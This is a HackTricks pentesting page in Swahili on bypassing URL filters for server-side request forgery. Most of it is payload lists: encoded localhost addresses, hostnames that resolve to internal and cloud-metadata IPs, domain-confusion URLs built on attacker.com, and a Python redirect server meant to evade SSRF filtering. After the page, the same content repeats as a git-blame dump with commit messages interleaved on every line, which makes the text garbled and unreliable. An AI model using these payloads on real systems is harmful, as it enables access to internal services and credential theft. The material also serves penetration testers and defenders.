hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

# Kizuizi la Muundo wa URL

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

**Kikundi cha Usalama cha Try Hard**

<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

*** 

### Mwenyeji wa Ndani
```bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (773).png>)

**Kifaa cha Burp** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) inatekeleza njia za kuepuka muundo wa anwani ya IP.

### Mchambuzi wa Kikoa
```bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
```

```
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
### Utata wa Kikoa
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com
```
### Njia na Vipanuzi Vipuuzi

Ikiwa unahitajika kwamba URL lazima imalizike kwa njia au kipanuzi, au lazima iwe na njia unaweza jaribu moja ya vipuuzi vifuatavyo:
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
### Fuzzing

Chombo [**recollapse**](https://github.com/0xacb/recollapse) inaweza kuzalisha mabadiliko kutoka kwa data iliyotolewa kujaribu kukiuka regex iliyotumiwa. Angalia [**chapisho hili**](https://0xacb.com/2022/11/21/recollapse/) pia kwa maelezo zaidi.

### Kukiuka kupitia kuelekeza

Inawezekana kwamba server ina **kuchuja ombi la awali** la SSRF **lakini sio** jibu la **kuelekeza** linalowezekana kwa ombi hilo. Kwa mfano, server inayoweza kudhurika na SSRF kupitia: `url=https://www.google.com/` inaweza kuwa **kuchuja paramu ya url**. Lakini ikiwa utatumia [server ya python kujibu na 302](https://pastebin.com/raw/ywAUhFrv) mahali unapotaka kuelekeza, unaweza kuwa na uwezo wa **kufikia anwani za IP zilizofutwa** kama 127.0.0.1 au hata **itifaki zilizofutwa** kama gopher.\
[Angalia ripoti hii.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()

class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
## Maelezo ya Mbinu

### Mbinu ya Mshale-nyuma

_Mbinu ya mshale-nyuma_ inatumia tofauti kati ya [Kiwango cha URL cha WHATWG](https://url.spec.whatwg.org/#url-parsing) na [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Wakati RFC3986 ni mfumo wa jumla kwa URIs, WHATWG ni maalum kwa URL za wavuti na imepokelewa na vivinjari vya kisasa. Tofauti kuu iko katika kutambua kwa kiwango cha WHATWG ya mshale-nyuma (`\`) kama sawa na mshale mbele (`/`), ikibadilisha jinsi URL zinavyopasuliwa, hasa kwa kuashiria mpito kutoka jina la mwenyeji kwenda kwenye njia katika URL.

![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)

### Utata Mwingine

![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (597).png>)

picha kutoka [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)

## Marejeo

* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)

**Kikundi cha Usalama cha Kujitahidi Kwa Kujitahidi**

<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 13:37:52 +00:00			`# Kizuizi la Muundo wa URL`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-01 17:15:42 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA USAJILI](https://github.com/sponsors/carlospolop)!`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 13:37:52 +00:00			`Kikundi cha Usalama cha Try Hard`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
			`{% embed url="https://discord.gg/tryhardsecurity" %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`***`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`### Mwenyeji wa Ndani`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
fix mess 2022-05-01 12:41:36 +00:00			`# Localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.0.0.1:80`
			`http://127.0.0.1:443`
			`http://127.0.0.1:22`
			`http://127.1:80`
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`http://127.000000000000000.1`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0`
GitBook: [#3686] No subject 2022-12-19 23:36:02 +00:00			`http:@0/ --> http://localhost/`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0.0.0.0:80`
			`http://localhost:80`
			`http://[::]:80/`
			`http://[::]:25/ SMTP`
			`http://[::]:3128/ Squid`
			`http://[0000::1]:80/`
			`http://[0:0:0:0:0:ffff:127.0.0.1]/thefile`
			`http://①②⑦.⓪.⓪.⓪`

fix mess 2022-05-01 12:41:36 +00:00			`# CDIR bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.127.127.127`
			`http://127.0.1.3`
			`http://127.0.0.0`

			`# Dot bypass`
			`127。0。0。1`
			`127%E3%80%820%E3%80%820%E3%80%821`

fix mess 2022-05-01 12:41:36 +00:00			`# Decimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://2130706433/ = http://127.0.0.1`
			`http://3232235521/ = http://192.168.0.1`
			`http://3232235777/ = http://192.168.1.1`

fix mess 2022-05-01 12:41:36 +00:00			`# Octal Bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0177.0000.0000.0001`
			`http://00000177.00000000.00000000.00000001`
			`http://017700000001`

fix mess 2022-05-01 12:41:36 +00:00			`# Hexadecimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`127.0.0.1 = 0x7f 00 00 01`
			`http://0x7f000001/ = http://127.0.0.1`
			`http://0xc0a80014/ = http://192.168.0.20`
			`0x7f.0x00.0x00.0x01`
			`0x0000007f.0x00000000.0x00000000.0x00000001`

GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`# Add 0s bypass`
			`127.000000000000.1`

fix mess 2022-05-01 12:41:36 +00:00			`# You can also mix different encoding formats`
			`# https://www.silisoftware.com/tools/ipconverter.php`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`# Malformed and rare`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localhost:+11211aaa`
			`localhost:00011211aaaa`
			`http://0/`
			`http://127.1`
			`http://127.0.1`

fix mess 2022-05-01 12:41:36 +00:00			`# DNS to localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localtest.me = 127.0.0.1`
			`customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1`
			`mail.ebc.apple.com = 127.0.0.6 (localhost)`
			`127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)`
			`www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com`
			`http://customer1.app.localhost.my.company.127.0.0.1.nip.io`
			`http://bugbounty.dod.network = 127.0.0.2 (localhost)`
			`1ynrnhl.xip.io == 169.254.169.254`
			`spoofed.burpcollaborator.net = 127.0.0.1`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`![](<../../.gitbook/assets/image (773).png>)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`Kifaa cha Burp [Burp-Encode-IP](https://github.com/e1abrador/Burp-Encode-IP) inatekeleza njia za kuepuka muundo wa anwani ya IP.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Mchambuzi wa Kikoa`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`https:attacker.com`
			`https:/attacker.com`
			`http:/\/\attacker.com`
			`https:/\attacker.com`
			`//attacker.com`
			`\/\/attacker.com/`
			`/\/attacker.com/`
			`/attacker.com`
			`%0D%0A/attacker.com`
			`#attacker.com`
			`#%20@attacker.com`
			`@attacker.com`
GitBook: [#3723] No subject 2023-01-02 12:00:18 +00:00			`http://169.254.1698.254\@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`attacker%00.com`
			`attacker%E3%80%82com`
			`attacker。com`
			`ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ`
			```

			```
			`① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾`
			`⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗`
			`⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰`
			`⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ`
			`Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ`
			`ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿`
			```
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`### Utata wa Kikoa`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`# Try also to change attacker.com for 127.0.0.1 to try to access localhost`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`# Try replacing https by http`
			`# Try URL-encoded characters`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://{domain}@attacker.com`
			`https://{domain}.attacker.com`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://{domain}%6D@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com/{domain}`
			`https://attacker.com/?d={domain}`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://attacker.com#{domain}`
			`https://attacker.com@{domain}`
			`https://attacker.com#@{domain}`
			`https://attacker.com%23@{domain}`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com%00{domain}`
			`https://attacker.com%0A{domain}`
			`https://attacker.com?{domain}`
			`https://attacker.com///{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com;https://{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com\.{domain}`
			`https://attacker.com/.{domain}`
			`https://attacker.com\@@{domain}`
			`https://attacker.com:\@@{domain}`
			`https://attacker.com#\@{domain}`
			`https://attacker.com\anything@{domain}/`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`# On each IP position try to put 1 attackers domain and the others the victim domain`
			`http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`

			`#Parameter pollution`
			`next={domain}&next=attacker.com`
			```
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`### Njia na Vipanuzi Vipuuzi`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`Ikiwa unahitajika kwamba URL lazima imalizike kwa njia au kipanuzi, au lazima iwe na njia unaweza jaribu moja ya vipuuzi vifuatavyo:`
GitBook: [#3109] No subject 2022-04-20 09:04:20 +00:00			```
			`https://metadata/vulerable/path#/expected/path`
			`https://metadata/vulerable/path#.extension`
			`https://metadata/expected/path/..%2f..%2f/vulnerable/path`
			```
GitBook: [#3670] No subject 2022-12-05 11:09:36 +00:00			`### Fuzzing`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Chombo [recollapse](https://github.com/0xacb/recollapse) inaweza kuzalisha mabadiliko kutoka kwa data iliyotolewa kujaribu kukiuka regex iliyotumiwa. Angalia [chapisho hili](https://0xacb.com/2022/11/21/recollapse/) pia kwa maelezo zaidi.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`### Kukiuka kupitia kuelekeza`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			Inawezekana kwamba server ina kuchuja ombi la awali la SSRF lakini sio jibu la kuelekeza linalowezekana kwa ombi hilo. Kwa mfano, server inayoweza kudhurika na SSRF kupitia: `url=https://www.google.com/` inaweza kuwa kuchuja paramu ya url. Lakini ikiwa utatumia [server ya python kujibu na 302](https://pastebin.com/raw/ywAUhFrv) mahali unapotaka kuelekeza, unaweza kuwa na uwezo wa kufikia anwani za IP zilizofutwa kama 127.0.0.1 au hata itifaki zilizofutwa kama gopher.\
			`[Angalia ripoti hii.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```python
			`#!/usr/bin/env python3`

			`#python3 ./redirector.py 8000 http://127.0.0.1/`

			`import sys`
			`from http.server import HTTPServer, BaseHTTPRequestHandler`

			`if len(sys.argv)-1 != 2:`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`print("Usage: {} <port_number> <url>".format(sys.argv[0]))`
			`sys.exit()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`class Redirect(BaseHTTPRequestHandler):`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`def do_GET(self):`
			`self.send_response(302)`
			`self.send_header('Location', sys.argv[2])`
			`self.end_headers()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()`
			```
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`## Maelezo ya Mbinu`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`### Mbinu ya Mshale-nyuma`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			_Mbinu ya mshale-nyuma_ inatumia tofauti kati ya [Kiwango cha URL cha WHATWG](https://url.spec.whatwg.org/#url-parsing) na [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Wakati RFC3986 ni mfumo wa jumla kwa URIs, WHATWG ni maalum kwa URL za wavuti na imepokelewa na vivinjari vya kisasa. Tofauti kuu iko katika kutambua kwa kiwango cha WHATWG ya mshale-nyuma (`\`) kama sawa na mshale mbele (`/`), ikibadilisha jinsi URL zinavyopasuliwa, hasa kwa kuashiria mpito kutoka jina la mwenyeji kwenda kwenye njia katika URL.
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Utata Mwingine`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (597).png>)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`picha kutoka [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00
a 2024-02-06 03:10:27 +00:00			`* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)`
			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`Kikundi cha Usalama cha Kujitahidi Kwa Kujitahidi`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
			`{% embed url="https://discord.gg/tryhardsecurity" %}`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-01 17:15:42 +00:00
